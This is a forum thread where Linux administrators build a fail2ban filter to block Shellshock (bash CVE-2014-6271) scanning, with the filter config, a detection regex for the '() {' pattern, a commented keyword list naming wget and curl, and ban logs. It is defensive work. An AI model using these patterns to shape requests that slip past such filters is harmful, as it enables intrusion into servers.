Linux - SecurityThis forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.
Notices
Welcome to LinuxQuestions.org, a friendly and active Linux Community.
You are currently viewing LQ as a guest. By joining our community you will have the ability to post topics, receive our newsletter, use the advanced search, subscribe to threads and access many other special features. Registration is quick, simple and absolutely free. Join our community today!
Note that registered members see fewer ads, and ContentLink is completely disabled once you log in.
If you have any problems with the registration process or your account login, please contact us. If you need to reset your password, click here.
Having a problem logging in? Please visit this page to clear all LQ-related cookies.
Get a virtual cloud desktop with the Linux distro that you want in less than five minutes with Shells! With over 10 pre-installed distros to choose from, the worry-free installation life is here! Whether you are a digital nomad or just looking for flexibility, Shells can put your Linux machine on the device that you want to use.
Exclusive for LQ members, get up to 45% off per month. Click here for more info.
I want to make a filter that well blocks out the folks if they try a few times. So far ping seems to be the most common. but then again there is alot in there I need to look for more things.
Thats just it the patch (since I am all patched to what ever is available) most I had to do from source code because nothing is yet available is all done on all my servers. (I have many)
The problem is that this is just the first patches and as we more understand the problem there will be more in the mean time I have clear scanning already starting in my logs from experimenters and websites used to detect and look for the flaw. I do not mind that but would like to take persistent attempts and block them to push folks away or at least stop them from going farther something anything.
So I want to be clear i am not filtering instead of patching . I have patched but would like to take more action. First versions of the patch CVE-2012-3410, CVE-2014-6271,CVE-2014-7169 was found not to be fully patched.
Just patching is not enough in my opinion. If you have a webserver just grep your logs
I am going to make a flaky attempt maybe someone could help me on this. I agree I have things that use wget in my attempt that I know will not work I am looking at the /bin and the error codes. I only have the logs I have and what I have seen online maybe folks have some weird logs that show attempts we can help form a decent filter.
Defiantly going to look closer at that szboardstretcher
I don't think I have the right synax or if you get what I am saying maybe thats overkill. Trust me I did this wrong. Habitual can you make it like that I see where you where going with the shellshock but that was just some guy scanning the folks who are dirty will not say that
and the filter put together and done by Habitual (Thanks man you rock)
cat /etc/fail2ban/filter.d/shellshock.conf
Code:
[INCLUDES]
# Read common prefixes. If any customizations available -- read them from
# common.local
#before = common.conf
[Definition]
#_daemon = apache2
# Option: failregex
# Notes.: regex to match the failures messages of bash in the logfile. The
# host must be matched by a group named "host". The tag "<HOST>" can
# be used for standard IP/hostname matching and is only an alias for
# (?:::f{4,6}:)?(?P<host>\S+)
# Values: TEXT
#
docroot = /var/www/html
failregex = <HOST>.*\(\s*\)\s*\{[^"]*\}\s*\;[^"]+
# Option: ignoreregex
# Notes.: regex to ignore. If this regex matches, the line is ignored.
# Values: TEXT
#
ignoreregex =
I have been getting warnings from this as folks try to hit me up. I know it can become more better as I see more attacks it will at least block a ip if its testing for something and well if your patched your at least logging a ip and blocking it too if there is another exploit . its something better then nothing
It has been pointed out that my RegEx casts far too wide a net and that my HOST string may catch and ban legitimate traffic on your site with such keywords at shopping, or scraping or a referrer that may utilize "cgi-bin" in its referrer string.
I tested this new failregex using a duplicate line in /var/log/test using
This new failregex scans only for the function and space right after that is being abused, regardless of what that function is now, or may be in the future (a new 'variant'?)
here is my most recent info on the fail2ban filter
# cat /etc/fail2ban/filter.d/shellshock.conf
Code:
[INCLUDES]
# Read common prefixes. If any customizations available -- read them from
# common.local
#before = common.conf
[Definition]
#_daemon = apache2
# Option: failregex
# Notes.: regex to match the failures messages of bash in the logfile. The
# host must be matched by a group named "host". The tag "<HOST>" can
# be used for standard IP/hostname matching and is only an alias for
# (?:::f{4,6}:)?(?P<host>\S+)
# Values: TEXT
#
docroot = /var/www/html
#old original method revised 09/27/14
#shellshock = ping|cgi-bin|bash|wget|curl|cat
#failregex = ^<HOST> .*"(GET|POST) .*\/(?:%(shellshock)s).*?"
failregex = <HOST>.*\(\s*\)\s*\{[^"]*\}\s*\;[^"]+
# Option: ignoreregex
# Notes.: regex to ignore. If this regex matches, the line is ignored.
# Values: TEXT
#
ignoreregex =
all seems good and grabs and emails me a whois so I can contact abuse email address.
Code:
cat /var/log/fail2ban.log
2014-10-19 04:48:03,221 fail2ban.server : INFO Changed logging target to /var/log/fail2ban.log for Fail2ban v0.8.4-SVN
2014-10-19 04:48:03,257 fail2ban.filter : INFO Log rotation detected for /var/log/apache2/error.log
2014-10-19 04:48:03,283 fail2ban.filter : INFO Log rotation detected for /var/log/apache2/access.log
2014-10-19 04:48:03,597 fail2ban.filter : INFO Log rotation detected for /var/log/apache2/error.log
2014-10-19 04:49:44,232 fail2ban.filter : INFO Log rotation detected for /var/log/syslog
2014-10-19 04:50:01,389 fail2ban.filter : INFO Log rotation detected for /var/log/apache2/access.log
2014-10-19 07:57:12,694 fail2ban.actions: WARNING [shellshock] Ban 5.135.35.32
2014-10-19 10:07:12,730 fail2ban.actions: WARNING [shellshock] Unban 5.135.35.32
2014-10-20 04:49:40,675 fail2ban.filter : INFO Log rotation detected for /var/log/syslog
2014-10-20 04:49:41,294 fail2ban.filter : INFO Log rotation detected for /var/log/auth.log
2014-10-20 04:49:41,345 fail2ban.filter : INFO Log rotation detected for /var/log/auth.log
2014-10-20 14:16:41,563 fail2ban.actions: WARNING [dovecot-pop3imap] Ban 218.5.76.26
2014-10-20 16:26:42,220 fail2ban.actions: WARNING [dovecot-pop3imap] Unban 218.5.76.26
2014-10-21 03:34:43,863 fail2ban.actions: WARNING [shellshock] Ban 184.106.228.211
2014-10-21 04:49:37,838 fail2ban.filter : INFO Log rotation detected for /var/log/mail.log
2014-10-21 04:49:38,210 fail2ban.filter : INFO Log rotation detected for /var/log/mail.log
2014-10-21 04:49:38,400 fail2ban.filter : INFO Log rotation detected for /var/log/mail.log
2014-10-21 04:49:38,676 fail2ban.filter : INFO Log rotation detected for /var/log/syslog
2014-10-21 04:49:38,771 fail2ban.filter : INFO Log rotation detected for /var/log/mail.log
2014-10-21 04:49:38,807 fail2ban.filter : INFO Log rotation detected for /var/log/mail.log
2014-10-21 04:49:39,212 fail2ban.filter : INFO Log rotation detected for /var/log/mail.log
2014-10-21 04:49:39,401 fail2ban.filter : INFO Log rotation detected for /var/log/mail.log
2014-10-21 04:49:39,773 fail2ban.filter : INFO Log rotation detected for /var/log/mail.log
2014-10-21 04:49:39,809 fail2ban.filter : INFO Log rotation detected for /var/log/mail.log
2014-10-21 04:49:39,840 fail2ban.filter : INFO Log rotation detected for /var/log/mail.log
2014-10-21 05:44:43,883 fail2ban.actions: WARNING [shellshock] Unban 184.106.228.211
2014-10-21 12:19:26,815 fail2ban.actions: WARNING [shellshock] Ban 104.192.0.18
2014-10-21 12:25:46,458 fail2ban.actions: WARNING [shellshock] 104.192.0.18 already banned
2014-10-21 14:29:27,793 fail2ban.actions: WARNING [shellshock] Unban 104.192.0.18
2014-10-22 00:14:30,322 fail2ban.jail : INFO Jail 'dovecot-pop3imap' stopped
2014-10-22 00:14:31,117 fail2ban.jail : INFO Jail 'courierauth' stopped
2014-10-22 00:14:32,093 fail2ban.jail : INFO Jail 'postfix' stopped
2014-10-22 00:14:32,816 fail2ban.jail : INFO Jail 'ssh-ddos' stopped
2014-10-22 00:14:33,161 fail2ban.jail : INFO Jail 'apache-multiport' stopped
2014-10-22 00:14:33,567 fail2ban.jail : INFO Jail 'pureftpd' stopped
2014-10-22 00:14:34,456 fail2ban.jail : INFO Jail 'couriersmtp' stopped
2014-10-22 00:14:35,176 fail2ban.jail : INFO Jail 'ssh' stopped
2014-10-22 00:14:35,718 fail2ban.jail : INFO Jail 'apache' stopped
2014-10-22 00:14:36,170 fail2ban.jail : INFO Jail 'sasl' stopped
2014-10-22 00:14:37,179 fail2ban.jail : INFO Jail 'shellshock' stopped
2014-10-22 00:14:37,417 fail2ban.jail : INFO Jail 'proftpd' stopped
2014-10-22 00:14:37,419 fail2ban.server : INFO Exiting Fail2ban
2014-10-22 00:14:37,694 fail2ban.server : INFO Changed logging target to /var/log/fail2ban.log for Fail2ban v0.8.4-SVN
2014-10-22 00:14:37,695 fail2ban.jail : INFO Creating new jail 'dovecot-pop3imap'
2014-10-22 00:14:37,695 fail2ban.jail : INFO Jail 'dovecot-pop3imap' uses poller
2014-10-22 00:14:37,707 fail2ban.filter : INFO Added logfile = /var/log/mail.log
2014-10-22 00:14:37,707 fail2ban.filter : INFO Set maxRetry = 5
2014-10-22 00:14:37,708 fail2ban.filter : INFO Set findtime = 600
2014-10-22 00:14:37,708 fail2ban.actions: INFO Set banTime = 7800
2014-10-22 00:14:37,712 fail2ban.jail : INFO Creating new jail 'pam-generic'
2014-10-22 00:14:37,712 fail2ban.jail : INFO Jail 'pam-generic' uses poller
2014-10-22 00:14:37,713 fail2ban.filter : INFO Added logfile = /var/log/auth.log
2014-10-22 00:14:37,713 fail2ban.filter : INFO Set maxRetry = 4
2014-10-22 00:14:37,714 fail2ban.filter : INFO Set findtime = 600
2014-10-22 00:14:37,714 fail2ban.actions: INFO Set banTime = 7800
2014-10-22 00:14:37,719 fail2ban.jail : INFO Creating new jail 'ssh-ddos'
2014-10-22 00:14:37,719 fail2ban.jail : INFO Jail 'ssh-ddos' uses poller
2014-10-22 00:14:37,719 fail2ban.filter : INFO Added logfile = /var/log/auth.log
2014-10-22 00:14:37,720 fail2ban.filter : INFO Set maxRetry = 4
2014-10-22 00:14:37,720 fail2ban.filter : INFO Set findtime = 600
2014-10-22 00:14:37,720 fail2ban.actions: INFO Set banTime = 7800
2014-10-22 00:14:37,724 fail2ban.jail : INFO Creating new jail 'apache-multiport'
2014-10-22 00:14:37,724 fail2ban.jail : INFO Jail 'apache-multiport' uses poller
2014-10-22 00:14:37,725 fail2ban.filter : INFO Added logfile = /var/log/apache2/error.log
2014-10-22 00:14:37,725 fail2ban.filter : INFO Set maxRetry = 4
2014-10-22 00:14:37,725 fail2ban.filter : INFO Set findtime = 600
2014-10-22 00:14:37,726 fail2ban.actions: INFO Set banTime = 7800
2014-10-22 00:14:37,729 fail2ban.jail : INFO Creating new jail 'apache-overflows'
2014-10-22 00:14:37,729 fail2ban.jail : INFO Jail 'apache-overflows' uses poller
2014-10-22 00:14:37,730 fail2ban.filter : INFO Added logfile = /var/log/apache2/error.log
2014-10-22 00:14:37,730 fail2ban.filter : INFO Set maxRetry = 2
2014-10-22 00:14:37,731 fail2ban.filter : INFO Set findtime = 600
2014-10-22 00:14:37,731 fail2ban.actions: INFO Set banTime = 7800
2014-10-22 00:14:37,735 fail2ban.jail : INFO Creating new jail 'couriersmtp'
2014-10-22 00:14:37,735 fail2ban.jail : INFO Jail 'couriersmtp' uses poller
2014-10-22 00:14:37,735 fail2ban.filter : INFO Added logfile = /var/log/mail.log
2014-10-22 00:14:37,736 fail2ban.filter : INFO Set maxRetry = 3
2014-10-22 00:14:37,736 fail2ban.filter : INFO Set findtime = 600
2014-10-22 00:14:37,737 fail2ban.actions: INFO Set banTime = 7800
2014-10-22 00:14:37,740 fail2ban.jail : INFO Creating new jail 'pureftpd'
2014-10-22 00:14:37,740 fail2ban.jail : INFO Jail 'pureftpd' uses poller
2014-10-22 00:14:37,740 fail2ban.filter : INFO Added logfile = /var/log/syslog
2014-10-22 00:14:37,741 fail2ban.filter : INFO Set maxRetry = 3
2014-10-22 00:14:37,741 fail2ban.filter : INFO Set findtime = 600
2014-10-22 00:14:37,742 fail2ban.actions: INFO Set banTime = 7800
2014-10-22 00:14:37,745 fail2ban.jail : INFO Creating new jail 'ssh'
2014-10-22 00:14:37,745 fail2ban.jail : INFO Jail 'ssh' uses poller
2014-10-22 00:14:37,746 fail2ban.filter : INFO Added logfile = /var/log/auth.log
2014-10-22 00:14:37,746 fail2ban.filter : INFO Set maxRetry = 3
2014-10-22 00:14:37,746 fail2ban.filter : INFO Set findtime = 600
2014-10-22 00:14:37,747 fail2ban.actions: INFO Set banTime = 7800
2014-10-22 00:14:37,816 fail2ban.jail : INFO Creating new jail 'postfix'
2014-10-22 00:14:37,816 fail2ban.jail : INFO Jail 'postfix' uses poller
2014-10-22 00:14:37,816 fail2ban.filter : INFO Added logfile = /var/log/mail.log
2014-10-22 00:14:37,817 fail2ban.filter : INFO Set maxRetry = 3
2014-10-22 00:14:37,817 fail2ban.filter : INFO Set findtime = 600
2014-10-22 00:14:37,818 fail2ban.actions: INFO Set banTime = 7800
2014-10-22 00:14:37,821 fail2ban.jail : INFO Creating new jail 'sasl'
2014-10-22 00:14:37,821 fail2ban.jail : INFO Jail 'sasl' uses poller
2014-10-22 00:14:37,821 fail2ban.filter : INFO Added logfile = /var/log/mail.log
2014-10-22 00:14:37,822 fail2ban.filter : INFO Set maxRetry = 3
2014-10-22 00:14:37,822 fail2ban.filter : INFO Set findtime = 600
2014-10-22 00:14:37,823 fail2ban.actions: INFO Set banTime = 7800
2014-10-22 00:14:37,827 fail2ban.jail : INFO Creating new jail 'apache'
2014-10-22 00:14:37,827 fail2ban.jail : INFO Jail 'apache' uses poller
2014-10-22 00:14:37,827 fail2ban.filter : INFO Added logfile = /var/log/apache2/error.log
2014-10-22 00:14:37,828 fail2ban.filter : INFO Set maxRetry = 4
2014-10-22 00:14:37,828 fail2ban.filter : INFO Set findtime = 600
2014-10-22 00:14:37,828 fail2ban.actions: INFO Set banTime = 7800
2014-10-22 00:14:37,831 fail2ban.jail : INFO Creating new jail 'courierauth'
2014-10-22 00:14:37,831 fail2ban.jail : INFO Jail 'courierauth' uses poller
2014-10-22 00:14:37,832 fail2ban.filter : INFO Added logfile = /var/log/mail.log
2014-10-22 00:14:37,832 fail2ban.filter : INFO Set maxRetry = 3
2014-10-22 00:14:37,833 fail2ban.filter : INFO Set findtime = 600
2014-10-22 00:14:37,833 fail2ban.actions: INFO Set banTime = 7800
2014-10-22 00:14:37,836 fail2ban.jail : INFO Creating new jail 'shellshock'
2014-10-22 00:14:37,836 fail2ban.jail : INFO Jail 'shellshock' uses poller
2014-10-22 00:14:37,837 fail2ban.filter : INFO Added logfile = /var/log/apache2/access.log
2014-10-22 00:14:37,837 fail2ban.filter : INFO Set maxRetry = 1
2014-10-22 00:14:37,838 fail2ban.filter : INFO Set findtime = 600
2014-10-22 00:14:37,839 fail2ban.actions: INFO Set banTime = 20000
2014-10-22 00:14:37,842 fail2ban.jail : INFO Creating new jail 'proftpd'
2014-10-22 00:14:37,842 fail2ban.jail : INFO Jail 'proftpd' uses poller
2014-10-22 00:14:37,843 fail2ban.filter : INFO Set maxRetry = 6
2014-10-22 00:14:37,843 fail2ban.filter : INFO Set findtime = 600
2014-10-22 00:14:37,843 fail2ban.actions: INFO Set banTime = 7800
2014-10-22 00:14:37,852 fail2ban.jail : INFO Jail 'dovecot-pop3imap' started
2014-10-22 00:14:37,854 fail2ban.jail : INFO Jail 'pam-generic' started
2014-10-22 00:14:37,855 fail2ban.jail : INFO Jail 'ssh-ddos' started
2014-10-22 00:14:37,855 fail2ban.jail : INFO Jail 'apache-multiport' started
2014-10-22 00:14:37,856 fail2ban.jail : INFO Jail 'apache-overflows' started
2014-10-22 00:14:37,857 fail2ban.jail : INFO Jail 'couriersmtp' started
2014-10-22 00:14:37,858 fail2ban.jail : INFO Jail 'pureftpd' started
2014-10-22 00:14:37,858 fail2ban.jail : INFO Jail 'ssh' started
2014-10-22 00:14:37,859 fail2ban.jail : INFO Jail 'postfix' started
2014-10-22 00:14:37,860 fail2ban.jail : INFO Jail 'sasl' started
2014-10-22 00:14:37,860 fail2ban.jail : INFO Jail 'apache' started
2014-10-22 00:14:37,862 fail2ban.jail : INFO Jail 'courierauth' started
2014-10-22 00:14:37,863 fail2ban.jail : INFO Jail 'shellshock' started
2014-10-22 00:14:37,863 fail2ban.jail : INFO Jail 'proftpd' started
2014-10-22 04:49:33,038 fail2ban.filter : INFO Log rotation detected for /var/log/syslog
2014-10-23 04:49:40,900 fail2ban.filter : INFO Log rotation detected for /var/log/syslog
2014-10-23 21:36:21,767 fail2ban.filter : WARNING Unable to find a corresponding IP address for 32.110.176.60.broad.hz.zj.dynamic.163data.com.cn
2014-10-23 21:36:28,922 fail2ban.filter : WARNING Unable to find a corresponding IP address for 32.110.176.60.broad.hz.zj.dynamic.163data.com.cn
2014-10-23 21:36:36,139 fail2ban.filter : WARNING Unable to find a corresponding IP address for 32.110.176.60.broad.hz.zj.dynamic.163data.com.cn
2014-10-23 21:36:44,704 fail2ban.actions: WARNING [pureftpd] Ban 60.176.110.32
2014-10-23 21:36:45,336 fail2ban.filter : WARNING Unable to find a corresponding IP address for 32.110.176.60.broad.hz.zj.dynamic.163data.com.cn
2014-10-23 23:46:45,404 fail2ban.actions: WARNING [pureftpd] Unban 60.176.110.32
2014-10-24 04:49:40,119 fail2ban.filter : INFO Log rotation detected for /var/log/mail.log
2014-10-24 04:49:40,409 fail2ban.filter : INFO Log rotation detected for /var/log/mail.log
2014-10-24 04:49:40,448 fail2ban.filter : INFO Log rotation detected for /var/log/mail.log
2014-10-24 04:49:40,519 fail2ban.filter : INFO Log rotation detected for /var/log/auth.log
2014-10-24 04:49:40,615 fail2ban.filter : INFO Log rotation detected for /var/log/mail.log
2014-10-24 04:49:40,627 fail2ban.filter : INFO Log rotation detected for /var/log/auth.log
2014-10-24 04:49:40,656 fail2ban.filter : INFO Log rotation detected for /var/log/auth.log
2014-10-24 04:49:40,766 fail2ban.filter : INFO Log rotation detected for /var/log/mail.log
2014-10-24 04:49:40,851 fail2ban.filter : INFO Log rotation detected for /var/log/syslog
2014-10-24 04:49:41,121 fail2ban.filter : INFO Log rotation detected for /var/log/mail.log
2014-10-24 04:49:41,411 fail2ban.filter : INFO Log rotation detected for /var/log/mail.log
2014-10-24 04:49:41,450 fail2ban.filter : INFO Log rotation detected for /var/log/mail.log
2014-10-24 04:49:41,617 fail2ban.filter : INFO Log rotation detected for /var/log/mail.log
2014-10-24 04:49:41,768 fail2ban.filter : INFO Log rotation detected for /var/log/mail.log
2014-10-24 19:02:44,194 fail2ban.actions: WARNING [ssh] Ban 222.186.21.66
2014-10-24 19:02:47,206 fail2ban.actions: WARNING [ssh] 222.186.21.66 already banned
2014-10-24 19:02:50,210 fail2ban.actions: WARNING [ssh] 222.186.21.66 already banned
2014-10-24 19:02:53,213 fail2ban.actions: WARNING [ssh] 222.186.21.66 already banned
2014-10-24 19:02:57,217 fail2ban.actions: WARNING [ssh] 222.186.21.66 already banned
2014-10-24 19:02:57,518 fail2ban.actions: WARNING [pam-generic] Ban 222.186.21.66
2014-10-24 21:12:44,794 fail2ban.actions: WARNING [ssh] Unban 222.186.21.66
2014-10-24 21:12:58,261 fail2ban.actions: WARNING [pam-generic] Unban 222.186.21.66
2014-10-25 04:49:39,765 fail2ban.filter : INFO Log rotation detected for /var/log/syslog
i go and install on a newer setup
and I get a error
# cat /var/log/fail2ban.log|tail
Code:
2014-10-25 12:30:37,210 fail2ban.filter : INFO Set findtime = 600
2014-10-25 12:30:37,210 fail2ban.actions: INFO Set banTime = 259200
2014-10-25 12:30:37,275 fail2ban.jail : INFO Jail 'ssh' started
2014-10-25 12:30:37,292 fail2ban.jail : INFO Jail 'ssh-ddos' started
2014-10-25 12:30:37,305 fail2ban.jail : INFO Jail 'apache' started
2014-10-25 12:30:37,345 fail2ban.jail : INFO Jail 'shellshock' started
2014-10-25 12:30:37,371 fail2ban.actions.action: ERROR iptables -N fail2ban-shellshock
iptables -A fail2ban-shellshock -j RETURN
iptables -I INPUT -p http --dport http -j fail2ban-shellshock returned 200
2014-10-25 12:30:37,386 fail2ban.jail : INFO Jail 'asterisk-iptables' started
2014-10-25 12:35:46,834 fail2ban.filter : INFO Set findtime = 600
2014-10-25 12:35:46,834 fail2ban.actions: INFO Set banTime = 259200
2014-10-25 12:35:46,893 fail2ban.jail : INFO Jail 'ssh' started
2014-10-25 12:35:46,917 fail2ban.jail : INFO Jail 'ssh-ddos' started
2014-10-25 12:35:46,935 fail2ban.jail : INFO Jail 'apache' started
2014-10-25 12:35:46,970 fail2ban.jail : INFO Jail 'shellshock' started
2014-10-25 12:35:46,980 fail2ban.actions.action: ERROR iptables -N fail2ban-shellshock
iptables -A fail2ban-shellshock -j RETURN
iptables -I INPUT -p http --dport http -j fail2ban-shellshock returned 200
2014-10-25 12:35:46,997 fail2ban.jail : INFO Jail 'asterisk-iptables' started
LinuxQuestions.org is looking for people interested in writing
Editorials, Articles, Reviews, and more. If you'd like to contribute
content, let us know.